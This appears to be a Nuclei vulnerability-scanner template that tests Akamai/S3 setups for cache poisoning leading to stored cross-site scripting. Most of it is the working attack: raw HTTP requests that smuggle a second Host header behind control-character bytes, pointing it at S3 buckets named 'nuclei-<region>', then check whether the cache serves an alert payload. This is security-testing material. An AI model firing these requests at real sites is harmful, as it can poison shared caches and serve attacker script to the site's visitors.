id: akamai-s3-cache-poisoning

info:
  name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting
  author: DhiyaneshDk
  severity: high
  reference:
    - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
    - https://owasp.org/www-community/attacks/Cache_Poisoning
  metadata:
    verified: "true"
  tags: cache,poisoning,generic,xss,akamai,s3

variables:
  rand: "{{rand_base(5)}}"

requests:
  - raw:
      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}
        {{escape}}Host: {{bucket}}

      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      escape:
        - "\x0b"
        - "\x0c"
        - "\x1c"
        - "\x1d"
        - "\x1e"
        - "\x1f"

      bucket:
        - "nuclei-ap-northeast-1"
        - "nuclei-ap-northeast-2"
        - "nuclei-ap-northeast-3"
        - "nuclei-ap-south-1"
        - "nuclei-ap-southeast-1"
        - "nuclei-ap-southeast-2"
        - "nuclei-ca-central-1"
        - "nuclei-eu-central-1"
        - "nuclei-eu-north-1"
        - "nuclei-eu-west-1"
        - "nuclei-eu-west-2"
        - "nuclei-eu-west-3"
        - "nuclei-sa-east-1"
        - "nuclei-us-east-1"
        - "nuclei-us-east-2"
        - "nuclei-us-west-1"
        - "nuclei-us-west-2"

    stop-at-first-match: true
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and